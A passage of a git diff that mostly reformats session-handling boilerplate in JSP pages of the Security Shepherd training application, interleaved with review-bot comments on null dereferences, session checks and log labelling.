--- a/src/main/webapp/admin/userManagement/unSuspendUser.jsp
+++ b/src/main/webapp/admin/userManagement/unSuspendUser.jsp
@@ -1,196 +1,226 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: unSuspendUser.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: unSuspendUser.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(unSuspendUser.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(unSuspendUser.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
//Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#suspendDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
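Review bot: When `Validate.getToken` throws, `catch(Exception htmlE)` only logs and leaves `tokenCookie` null, yet `tokenCookie.getValue()` is dereferenced a few lines later inside the admin branch. That is safe only if `validateAdminSession` returns false for a null cookie, which the comment above the call implies but this hunk does not show. Making the dependency explicit costs one condition: `if(tokenCookie != null && Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))`. The same sequence is in the other userManagement hunks of this commit.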
diff --git a/src/main/webapp/admin/userManagement/upgradePlayers.jsp b/src/main/webapp/admin/userManagement/upgradePlayers.jsp
index 7accbaca5..4dbd8c0ee 100644
--- a/src/main/webapp/admin/userManagement/upgradePlayers.jsp
+++ b/src/main/webapp/admin/userManagement/upgradePlayers.jsp
@@ -1,198 +1,228 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*, servlets.admin.userManagement.GetPlayersByClass"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: upgradePlayer.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: upgradePlayer.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(upgradePlayers.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(upgradePlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
//Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+String ApplicationRoot = getServletContext().getRealPath("");
+boolean showClasses = false;
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#upgradeDiv").slideDown("slow");
+ });
+ });
+ }
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
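Review bot: The outer guard `if (request.getSession() != null)` can never fail, because `HttpServletRequest.getSession()` with no argument creates a session when the request has none. The final `else` redirect is therefore dead code, and every unauthenticated hit on this admin page allocates a session before `Validate.validateAdminSession` runs. Using `HttpSession ses = request.getSession(false);` followed by `if (ses != null)` would make the check meaningful; the same pattern recurs in blockedMessage.jsp and the challenge pages later in this diff. Separately, the added `<%= Analytics.googleAnalyticsScript %>` line writes its value unencoded into an administrator page. Its definition is not visible here, so it is worth confirming that it is a fixed, operator-configured snippet, since any script loaded there runs with access to the page's CSRF token.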
diff --git a/src/main/webapp/blockedMessage.jsp b/src/main/webapp/blockedMessage.jsp
index 89c804b94..31fa8e0c9 100644
--- a/src/main/webapp/blockedMessage.jsp
+++ b/src/main/webapp/blockedMessage.jsp
@@ -1,73 +1,82 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="dbProcs.Getter, utils.*" errorPage="" %>
-<%@ include file="translation.jsp" %>
+ import="dbProcs.Getter, utils.*" errorPage=""%>
+<%@ include file="translation.jsp"%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: scoreboard.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: scoreboard.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // Also, if tokenCookie != null, then the page is good to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- //Log User Name
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Scoreboard accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // Also, if tokenCookie != null, then the page is good to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ //Log User Name
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Scoreboard accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
-
-
+
+
+
-
-
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
- } else {
- response.sendRedirect("login.jsp");
- }
- } else {
- response.sendRedirect("login.jsp");
- }
+ }
+ else
+ {
+ response.sendRedirect("login.jsp");
+ }
+}
+else
+{
+ response.sendRedirect("login.jsp");
+}
%>
\ No newline at end of file
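Review bot: The log messages in this file still identify it as the scoreboard: `"DEBUG: scoreboard.jsp *************************"`, `"DEBUG(scoreboard.jsp): tokenCookie Error:"` and `"Scoreboard accessed by: "` are all emitted from blockedMessage.jsp, so access records for the two pages cannot be told apart during log review. Renaming them, for example to `"DEBUG: blockedMessage.jsp *************************"` and `"Blocked message accessed by: "`, would restore correct attribution. These events also record the client-supplied `X-Forwarded-For` header; whether `ShepherdLogManager.logEvent` neutralises line breaks in that value is not visible from this hunk and should be confirmed before the logs are relied on as an audit trail.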
diff --git a/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp b/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp
index 5873eb71d..f029b3204 100644
--- a/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp
+++ b/src/main/webapp/challenges/06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751.jsp
@@ -1,143 +1,152 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java"
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- // Cross Site Scripting Challenge 4
+ // Cross Site Scripting Challenge 4
- String levelName = new String("Cross Site Scripting Four");
- String levelHash = "06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751";
+String levelName = new String("Cross Site Scripting Four");
+String levelHash = "06f81ca93f26236112f8e31f32939bd496ffe8c9f7b564bce32bd5e3a8c2f751";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.xss." + levelHash, locale);
//Used more than once translations
- String translatedLevelName = bundle.getString("challenge.challengeName");
+String translatedLevelName = bundle.getString("challenge.challengeName");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
+
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
%>
-
- Security Shepherd - <%= Encode.forHtml(translatedLevelName) %>
-
-
+
+Security Shepherd - <%= Encode.forHtml(translatedLevelName) %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
+/**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
//No Quotes In level Name
- String levelName = "Mobile Reverse Engineer 1";
+String levelName = "Mobile Reverse Engineer 1";
//Alphanumeric Only
- String levelHash = "072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp";
+String levelHash = "072a9e4fc888562563adf8a89fa55050e3e1cfbbbe1d597b0537513ac8665295.jsp";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
- ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.reverseEngineer.reverseEngineer", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
//Used more than once translations
- String i18nLevelName = bundle.getString("challenge1.challengeName");
- String paragraph1 = bundle.getString("challenge1.para1");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-
+String i18nLevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+
%>
-
- Security Shepherd - <%= i18nLevelName %>
-
-
+
+Security Shepherd - <%= i18nLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
+/**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
//No Quotes In level Name
- String levelName = "Mobile Insecure Data Storage 3";
+String levelName = "Mobile Insecure Data Storage 3";
//Alphanumeric Only
- String levelHash = "11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851";
+String levelHash = "11ccaf2f3b2aa4f88265b9cacb5e0ed26b11af978523e34528cf0bb9d32de851";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
- ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
//Used more than once translations
- String LevelName = bundle.getString("challenge3.challengeName");
- String paragraph1 = bundle.getString("challenge3.para1");
+String LevelName = bundle.getString("challenge3.challengeName");
+String paragraph1 = bundle.getString("challenge3.para1");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%= levelName %>
-
-
+
+Security Shepherd - <%= levelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+/**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
//No Quotes In level Name
- String levelName = "Insecure Direct Object Reference Bank Challenge";
+String levelName = "Insecure Direct Object Reference Bank Challenge";
//Alphanumeric Only
- String levelHash = "1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c";
+String levelHash = "1f0935baec6ba69d79cfb2eba5fdfa6ac5d77fadee08585eb98b130ec524d00c";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.directObject." + levelHash, locale);
//Used more than once translations
- String i18nChallengeName = bundle.getString("challenge.challengeName");
+String i18nChallengeName = bundle.getString("challenge.challengeName");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
